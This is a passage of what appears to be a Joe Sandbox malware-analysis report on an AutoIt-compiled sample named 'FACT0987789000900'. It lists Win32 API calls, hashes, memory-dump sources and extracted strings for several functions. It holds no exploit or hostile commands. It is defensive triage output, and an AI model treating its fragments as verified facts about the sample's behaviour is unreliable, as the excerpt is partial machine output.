                                                                                                                • Instruction Fuzzy Hash: A6C1D43220519309DF6D463AC43447FFAA15EA2BB231A076FD4B3CB6D5EF28D528D624
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                • Instruction ID: 5738118d8477ab60174bb8672b02cdcf7874b39043f47ce874a9af2ac6faef88
                                                                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                • Instruction Fuzzy Hash: 3FC1813220509309DF6D46BAC47443FBAA15AB3BB131A077ED4B3CB6D5EF28D528D624
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 004EA2FE
                                                                                                                • DeleteObject.GDI32(00000000), ref: 004EA310
                                                                                                                • DestroyWindow.USER32 ref: 004EA31E
                                                                                                                • GetDesktopWindow.USER32 ref: 004EA338
                                                                                                                • GetWindowRect.USER32(00000000), ref: 004EA33F
                                                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004EA480
                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004EA490
                                                                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004EA4D8
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004EA4E4
                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004EA51E
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004EA540
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004EA553
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004EA55E
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004EA567
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004EA576
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004EA57F
                                                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004EA586
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004EA591
                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 004EA5A3
                                                                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0051D9BC,00000000), ref: 004EA5B9
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004EA5C9
                                                                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 004EA5EF
                                                                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 004EA60E
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004EA630
                                                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004EA81D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                • API String ID: 2211948467-2373415609
                                                                                                                • Opcode ID: ed03e9fac64514ad7795d323cb00b70634af3e14b0bc035520c4dc4c65496156
                                                                                                                • Instruction ID: fb3675f40c25447252aecc334f57114609535df2b8b8652dd35da2eeac50411d
                                                                                                                • Opcode Fuzzy Hash: ed03e9fac64514ad7795d323cb00b70634af3e14b0bc035520c4dc4c65496156
                                                                                                                • Instruction Fuzzy Hash: 8402CC75900204EFCB14DFA5CD88EAE7BB8FB48315F008169F915AB2A0C738ED05DB64
                                                                                                                APIs
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004FD2DB
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004FD30C
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004FD318
                                                                                                                • SetBkColor.GDI32(?,000000FF), ref: 004FD332
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 004FD341
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004FD36C
                                                                                                                • GetSysColor.USER32(00000010), ref: 004FD374
                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 004FD37B
                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 004FD38A
                                                                                                                • DeleteObject.GDI32(00000000), ref: 004FD391
                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 004FD3DC
                                                                                                                • FillRect.USER32(?,?,00000000), ref: 004FD40E
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004FD439
                                                                                                                  • Part of subcall function 004FD575: GetSysColor.USER32(00000012), ref: 004FD5AE
                                                                                                                  • Part of subcall function 004FD575: SetTextColor.GDI32(?,?), ref: 004FD5B2
                                                                                                                  • Part of subcall function 004FD575: GetSysColorBrush.USER32(0000000F), ref: 004FD5C8
                                                                                                                  • Part of subcall function 004FD575: GetSysColor.USER32(0000000F), ref: 004FD5D3
                                                                                                                  • Part of subcall function 004FD575: GetSysColor.USER32(00000011), ref: 004FD5F0
                                                                                                                  • Part of subcall function 004FD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004FD5FE
                                                                                                                  • Part of subcall function 004FD575: SelectObject.GDI32(?,00000000), ref: 004FD60F
                                                                                                                  • Part of subcall function 004FD575: SetBkColor.GDI32(?,00000000), ref: 004FD618
                                                                                                                  • Part of subcall function 004FD575: SelectObject.GDI32(?,?), ref: 004FD625
                                                                                                                  • Part of subcall function 004FD575: InflateRect.USER32(?,000000FF,000000FF), ref: 004FD644
                                                                                                                  • Part of subcall function 004FD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004FD65B
                                                                                                                  • Part of subcall function 004FD575: GetWindowLongW.USER32(00000000,000000F0), ref: 004FD670
                                                                                                                  • Part of subcall function 004FD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004FD698
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 3521893082-0
                                                                                                                • Opcode ID: 45ca5e3cf1c58a301811635966ea2900ecb04148b218bbf922c8431d654f2756
                                                                                                                • Instruction ID: 87196f1570c1ed30bf3d3dab6e144366e027d54bed0626367d4ff9bc36e877e0
                                                                                                                • Opcode Fuzzy Hash: 45ca5e3cf1c58a301811635966ea2900ecb04148b218bbf922c8431d654f2756
                                                                                                                • Instruction Fuzzy Hash: 4191C272408305BFC7109F64DC08EAB7BBAFF99325F104A19FA62961E0D734D948DB62
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 004DDBD6
                                                                                                                • GetDriveTypeW.KERNEL32(?,0052DC54,?,\\.\,0052DC00), ref: 004DDCC3
                                                                                                                • SetErrorMode.KERNEL32(00000000,0052DC54,?,\\.\,0052DC00), ref: 004DDE29
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DriveType
                                                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                • API String ID: 2907320926-4222207086
                                                                                                                • Opcode ID: fa45abb09bc3affd9ac7615c36ec23ca6b7aa7533ae2cd8d74ea3519f36496c6
                                                                                                                • Instruction ID: 998aead38bcfc09a7071ff64a1bfb9f544d8b70506ff9b8d5452502e53dcec8f
                                                                                                                • Opcode Fuzzy Hash: fa45abb09bc3affd9ac7615c36ec23ca6b7aa7533ae2cd8d74ea3519f36496c6
                                                                                                                • Instruction Fuzzy Hash: 8151B930A487419BCB14DF24C8A296ABBA2FF94708F20452FF447973A1DB78D946D74B
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                • API String ID: 1038674560-86951937
                                                                                                                • Opcode ID: 995e8a2d4ce84b176ada45af1e1fc3fb30c585ac44cefda9fc46a52e7f17fe8a
                                                                                                                • Instruction ID: c70a80d582198bebe341fb1a51d194df4d646fe35cb5f505fcb1417333296cb6
                                                                                                                • Opcode Fuzzy Hash: 995e8a2d4ce84b176ada45af1e1fc3fb30c585ac44cefda9fc46a52e7f17fe8a
                                                                                                                • Instruction Fuzzy Hash: 0C810631640215AACF10AB65DC92FBF3F78BF25344F04403AF906AA1D6EB68D901C6A9
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32 ref: 004AB98B
                                                                                                                • DeleteObject.GDI32(00000000), ref: 004AB9CD
                                                                                                                • DeleteObject.GDI32(00000000), ref: 004AB9D8
                                                                                                                • DestroyCursor.USER32(00000000), ref: 004AB9E3
                                                                                                                • DestroyWindow.USER32(00000000), ref: 004AB9EE
                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0050D2AA
                                                                                                                • 6FFC0200.COMCTL32(?,000000FF,?), ref: 0050D2E3
                                                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0050D711
                                                                                                                  • Part of subcall function 004AB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004AB759,?,00000000,?,?,?,?,004AB72B,00000000,?), ref: 004ABA58
                                                                                                                • SendMessageW.USER32 ref: 0050D758
                                                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0050D76F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DestroyMessageSendWindow$DeleteObject$C0200CursorInvalidateMoveRect
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3497448939-4108050209
                                                                                                                • Opcode ID: e15edcb30899bf375bd240490ee72a4c02699a6f72fe68a608d38bae9c42fb0d
                                                                                                                • Instruction ID: ba53f4ee85e9dcb7cf725ce7516aa2fa14b47df8ec0154755ea89e769662bb81
                                                                                                                • Opcode Fuzzy Hash: e15edcb30899bf375bd240490ee72a4c02699a6f72fe68a608d38bae9c42fb0d
                                                                                                                • Instruction Fuzzy Hash: C8129074104201DFDB25CF68C884BAABBF5FF59304F14456AE989CB2A2C735EC46DBA1
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 004FC788
                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004FC83E
                                                                                                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 004FC859
                                                                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 004FCB15
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2326795674-4108050209
                                                                                                                • Opcode ID: 78cdb95e4883c25cad751f6e94b5151d9abd57b2c90c3e90d16c8a399c6898ce
                                                                                                                • Instruction ID: 6b73a17316867efb1fbf8d194d8bb3ab89a4c74dcbe55743046331f29b5a1d79
                                                                                                                • Opcode Fuzzy Hash: 78cdb95e4883c25cad751f6e94b5151d9abd57b2c90c3e90d16c8a399c6898ce
                                                                                                                • Instruction Fuzzy Hash: 0EF1E07050430DAFD7208F24C985BBBBBE4FF49354F08451AF688962A1C778D845DBA6
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?,0052DC00), ref: 004F6449
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                • API String ID: 3964851224-45149045
                                                                                                                • Opcode ID: 4300795b8409b273d4c46f2d64304303d6d7ae6db33fc748c7108d7a94ce13a6
                                                                                                                • Instruction ID: be704c7199382367a0622776653a633eda84f34e2d3354344fa72d40305e5ee3
                                                                                                                • Opcode Fuzzy Hash: 4300795b8409b273d4c46f2d64304303d6d7ae6db33fc748c7108d7a94ce13a6
                                                                                                                • Instruction Fuzzy Hash: F8C1A2342042099BCA04FF11C551ABE7BE5AF95358F01486FF9555B393DB28ED0BCB8A
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000012), ref: 004FD5AE
                                                                                                                • SetTextColor.GDI32(?,?), ref: 004FD5B2
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004FD5C8
                                                                                                                • GetSysColor.USER32(0000000F), ref: 004FD5D3
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 004FD5D8
                                                                                                                • GetSysColor.USER32(00000011), ref: 004FD5F0
                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 004FD5FE
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 004FD60F
                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 004FD618
                                                                                                                • SelectObject.GDI32(?,?), ref: 004FD625
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004FD644
                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004FD65B
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 004FD670
                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004FD698
                                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 004FD6BF
                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 004FD6DD
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 004FD6E8
                                                                                                                • GetSysColor.USER32(00000011), ref: 004FD6F6
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004FD6FE
                                                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004FD712
                                                                                                                • SelectObject.GDI32(?,004FD2A5), ref: 004FD729
                                                                                                                • DeleteObject.GDI32(?), ref: 004FD734
                                                                                                                • SelectObject.GDI32(?,?), ref: 004FD73A
                                                                                                                • DeleteObject.GDI32(?), ref: 004FD73F
                                                                                                                • SetTextColor.GDI32(?,?), ref: 004FD745
                                                                                                                • SetBkColor.GDI32(?,?), ref: 004FD74F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 1996641542-0
                                                                                                                • Opcode ID: dadeaea5423c72356122edd757ee69d34526a8cecdf137ca6c5df370dd7543e9
                                                                                                                • Instruction ID: 3c45fe00e4daea3780abd572a7a9a2b5d6afc90df5565d13ceedefbf4e3e5afa
                                                                                                                • Opcode Fuzzy Hash: dadeaea5423c72356122edd757ee69d34526a8cecdf137ca6c5df370dd7543e9
                                                                                                                • Instruction Fuzzy Hash: 1A515B71D00218BFDB10AFA4DC48EEE7B7AEF18320F118115FA15AB2A1D7759A44DB60
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 004FB7B0
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004FB7C1
                                                                                                                • CharNextW.USER32(0000014E), ref: 004FB7F0
                                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 004FB831
                                                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 004FB847
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004FB858
                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 004FB875
                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 004FB8C7
                                                                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 004FB8DD
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 004FB90E
                                                                                                                • _memset.LIBCMT ref: 004FB933
                                                                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 004FB97C
                                                                                                                • _memset.LIBCMT ref: 004FB9DB
                                                                                                                • SendMessageW.USER32 ref: 004FBA05
                                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 004FBA5D
                                                                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 004FBB0A
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004FBB2C
                                                                                                                • GetMenuItemInfoW.USER32(?), ref: 004FBB76
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004FBBA3
                                                                                                                • DrawMenuBar.USER32(?), ref: 004FBBB2
                                                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 004FBBDA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1073566785-4108050209
                                                                                                                • Opcode ID: 8bf7cf97eb1c74e955f30b2024ba01bffa557a3e78005b8e3a72918bc2596d89
                                                                                                                • Instruction ID: a210da1d61df796aa6e49538a5fd03656b927cd892d5d4855fc0dea3bb074821
                                                                                                                • Opcode Fuzzy Hash: 8bf7cf97eb1c74e955f30b2024ba01bffa557a3e78005b8e3a72918bc2596d89
                                                                                                                • Instruction Fuzzy Hash: EFE19E7490021CAADB109FA1CC84EFF7BB8FF06714F10815BFA15AA290D7789A45DFA5
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 004F778A
                                                                                                                • GetDesktopWindow.USER32 ref: 004F779F
                                                                                                                • GetWindowRect.USER32(00000000), ref: 004F77A6
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 004F7808
                                                                                                                • DestroyWindow.USER32(?), ref: 004F7834
